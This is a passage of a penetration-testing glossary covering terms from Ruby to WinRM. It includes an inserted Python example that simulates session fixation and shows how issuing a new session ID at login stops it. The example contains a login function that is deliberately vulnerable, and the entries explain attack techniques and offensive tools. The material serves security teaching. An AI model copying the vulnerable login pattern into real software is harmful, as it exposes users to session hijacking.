Ruby A programming language. You can download and obtain information about Ruby from ruby-lang.org.

rules of engagement document Documentation that specifies the conditions under which a security penetration testing engagement will be conducted. A tester needs to document and agree upon these rules of engagement conditions with the client or an appropriate stakeholder.

S

sandbox analysis The analysis of malware in a sandbox, or safe environment.

scarcity A social engineering technique whereby an attacker creates a feeling of heightened urgency in a decision-making context to convince targets to reveal information.

SearchSploit A tool used to download a copy of the Exploit-DB (exploit-db.com) and search downloaded exploits.

secure software development life cycle (SSDLC) The process of incorporating security best practices, policies, and technologies to find and remediate vulnerabilities during the software development life cycle (SDLC). OWASP provides best practices for and guidance on implementing SSDLC at https://owasp.org/www-project-integration-standards/writeups/owasp_in_sdlc.

sensitive data Data that, if compromised, would have a severe impact on an organization.

service enumeration The process of identifying the services running on a remote system. This is the main focus of Nmap port scanning.

service-level agreement (SLA) A well-documented expectation or constraint describing one or more of the minimum and/or maximum performance measures (such as quality, timeline/time frame, and cost) for a network.

session fixation A type of attack in which an attacker obtains or sets a valid session ID (for example, by supplying it in a crafted link) and induces the victim to authenticate while using that session ID. If the application does not issue a new session ID upon login, the attacker can then use the known session ID to act as the authenticated victim.
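Worked example (added here; not part of the original glossary): the attack simulated against a session store that keeps the pre-authentication ID, and again against one that regenerates the ID on login. The dictionary-backed store and the login flow are constructed stand-ins for a web framework’s session layer; the user names are made up.

```python
"""Session fixation and the regenerate-on-login fix.

Added example, not from the glossary. SessionStore is a constructed
stand-in for a framework's session layer; user names are made up.
"""
import secrets


class SessionStore:
    def __init__(self):
        self._sessions = {}            # session_id -> dict of attributes

    def get_or_create(self, presented_id):
        """Pre-authentication: accept the presented ID if known, else mint one.

        An attacker can plant `presented_id` (for example, in a crafted link)
        and present the same value later."""
        if presented_id in self._sessions:
            return presented_id
        new_id = secrets.token_urlsafe(32)
        self._sessions[new_id] = {}
        return new_id

    def login_vulnerable(self, session_id, user):
        """Keeps the pre-auth session ID: whoever knows it is now `user`."""
        self._sessions[session_id]["user"] = user
        return session_id

    def login_safe(self, session_id, user):
        """Fix: invalidate the pre-auth session and issue a fresh ID on login."""
        attrs = self._sessions.pop(session_id, {})
        attrs["user"] = user
        new_id = secrets.token_urlsafe(32)
        self._sessions[new_id] = attrs
        return new_id

    def whoami(self, session_id):
        return self._sessions.get(session_id, {}).get("user")


def fixation_succeeds(use_fix):
    """Simulate the attack: the attacker obtains an ID, the victim logs in
    with it, the attacker presents the same ID. Returns True if the attacker
    ends up logged in as the victim."""
    store = SessionStore()
    planted = store.get_or_create(None)               # attacker gets a valid ID
    victim_session = store.get_or_create(planted)     # victim uses the planted ID
    if use_fix:
        store.login_safe(victim_session, "victim")
    else:
        store.login_vulnerable(victim_session, "victim")
    return store.whoami(planted) == "victim"


if __name__ == "__main__":
    print("no regeneration, attacker hijacks session:", fixation_succeeds(use_fix=False))
    print("regeneration on login, attacker hijacks session:", fixation_succeeds(use_fix=True))
```

Regenerating the ID on every privilege change is the core fix. Refusing session IDs that arrive in the URL (as opposed to a cookie the server itself set) removes the easiest way to plant one in the first place.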

shell A utility (software) that acts as an interface between a user and the operating system (the kernel and its services). For example, in Linux there are several shell environments, such as Bash, ksh, and tcsh. In Windows, the shells are the command prompt (cmd.exe) and PowerShell.

Shodan A search engine for devices connected to the Internet that continuously scans the Internet and exposes its results to users via the website https://www.shodan.io and via an API. Attackers can use this tool to identify vulnerable and exposed systems on the Internet (such as misconfigured IoT devices and infrastructure devices). Penetration testers can use it to gather information about potentially vulnerable systems exposed to the Internet without actively scanning the victim.

Short Message Service (SMS) phishing A phishing exploit that uses SMS to send malware or malicious links to mobile devices.

shoulder surfing A process in which an attacker obtains information such as personally identifiable information (PII), passwords, and other confidential data by looking over a victim’s shoulder.

side-channel attack An attack that is typically based on information gained from the implementation of the underlying computer system (or cloud environment) instead of a specific weakness in the implemented technology or algorithm. The attacker aims to gather information from or influence an application or a system by measuring or exploiting indirect effects of the system or its hardware. Most side-channel attacks are used to exfiltrate credentials, cryptographic keys, or any other sensitive information by measuring coincidental hardware emissions.

Social-Engineer Toolkit (SET) A tool that can be used to launch numerous social engineering attacks and that can also be integrated with third-party tools and frameworks such as Metasploit.

social proof A social engineering technique in which the target is not able to determine the appropriate mode of behavior in a given situation or environment. The attacker establishes what the “normal” behavior is to convince targets to reveal information.

software development kit (SDK) A set of software tools and programs used by developers to create applications.

spamming The act of sending unsolicited email messages.

spear phishing Phishing attempts that are constructed in a very specific way and directly targeted to specific individuals or companies. The attacker studies the victim and the victim’s organization to make emails look legitimate, perhaps even as though they are from trusted users within the corporation.

SQL injection (SQLi) A type of attack in which the attacker inserts, or “injects,” partial or complete SQL queries via a web application. SQL commands are injected into data plane input in order to execute predefined SQL commands.

SQLmap A tool used to automate an SQL injection attack.

stacked queries An SQL injection technique in which multiple queries are submitted in a single request, allowing the attacker to execute any SQL statement or procedure. A typical attack using this technique supplies a malicious statement as input alongside the one the application expects to run.

statement of work (SOW) A document that specifies the activities to be performed during a penetration testing engagement.

stealth scan A scan that is run without alerting the defensive position of the environment. It involves implementing a vulnerability scanner in such a manner that the target is unlikely to detect the activity.

steganography The act of hiding a message or other content within an image or video file.

string operator A Python construct used to manipulate values of variables in various useful ways.

supervisory control and data acquisition (SCADA) A set of hardware components and software used to control and interact with devices such as sensors, pumps, motors, valves, and other industrial control systems.

Sysinternals A suite of tools that allows administrators to control Windows-based computers from a remote terminal. It is possible to use Sysinternals to upload, execute, and interact with executables on compromised hosts. The entire suite works from a command-line interface and can be scripted to run commands that can reveal information about running processes and to kill or stop services.

T

tailgating A situation in which an unauthorized individual follows an authorized individual to enter a restricted building or facility.

technical controls Controls that make use of technology to reduce vulnerabilities.

theHarvester A passive reconnaissance tool.

threat actor A person or group who is responsible for a security incident. The main categories of threat actors are organized crime, insider threat, state sponsored, and hacktivist.

time-of-day restrictions Restrictions on user access that are based on the time of the day. For example, you may only allow certain users to access specific systems during working hours.

tree A non-linear data structure represented by nodes in a hierarchical model.

TruffleHog A tool used to search through Git repositories and to obtain sensitive information such as secrets and to analyze code commit history and branches. You can download TruffleHog from https://github.com/trufflesecurity/truffleHog.

U

unauthenticated scan A method of vulnerability scanning that is used to perform a “black box” type of penetration test. It scans only the network services that are exposed to the network because there are no credentials used for access to the target.

Universal Serial Bus (USB) drop key An attack in which an attacker drops USB flash drives loaded with malware in a public place in the hopes that targets will pick them up and, out of curiosity, plug them into systems to see what’s on them. Once one of these drives is plugged in, the malware can automatically run and infect the system.

unknown-environment testing Testing in which the tester is provided only a very limited amount of information (for instance, only the domain names and IP addresses that are in scope for a particular target). The idea of this type of limitation is to have the tester start out with the perspective that an external attacker might have. Formerly referred to as black-box penetration testing.

user enumeration The process of gathering a valid list of users, which is the first step in cracking a set of credentials. Armed with the username, it is possible to begin attempts to brute force the password of the account. User enumeration is performed again after gaining access to the internal network.

V

vertical privilege escalation A situation in which a lower-privileged user accesses functions reserved for higher-privileged users (such as root or administrator access).

virtual local area network (VLAN) hopping A method of gaining access to traffic on other VLANs that would normally not be accessible.

virtual machine (VM) escape An attack in which an attacker can access other VMs or the hypervisor (escape) in order to compromise those systems.

vishing A social engineering attack carried out via a phone conversation. The attacker persuades the user to reveal private personal and financial information or information about another person or a company. The term is short for voice phishing.

vulnerability A weakness in an information system or in system security procedures, internal controls, or implementation that could be exploited or triggered by a threat source.

vulnerability scanning A technique used to identify hosts or hosts’ attributes and associated vulnerabilities.

W

w3af A web application scanner.

watering hole attack A targeted attack that occurs when an attacker profiles the websites that the intended victim accesses.

web page enumeration/web application enumeration A process that involves looking at a web application and mapping out the attack surface.

whaling An attack that is similar to phishing and spear phishing except that it is targeted at high-profile business executives and key individuals in a company. Whaling emails are designed to look like critical business emails or as though they come from someone with legitimate authority. Whaling web pages are designed to specifically attract high-profile victims.

Whois A tool used to obtain domain registration information and IP address block ownership information.

WinDbg A Windows-based debugger.

Windows Management Instrumentation (WMI) The infrastructure used to manage data and operations on Windows operating systems. It is possible to write WMI scripts or applications to automate administrative tasks on remote computers. Threat actors use WMI to perform different activities in a compromised system.

Windows Remote Management (WinRM) A legitimate way to connect to Windows systems that can also be useful for post-exploitation activities.
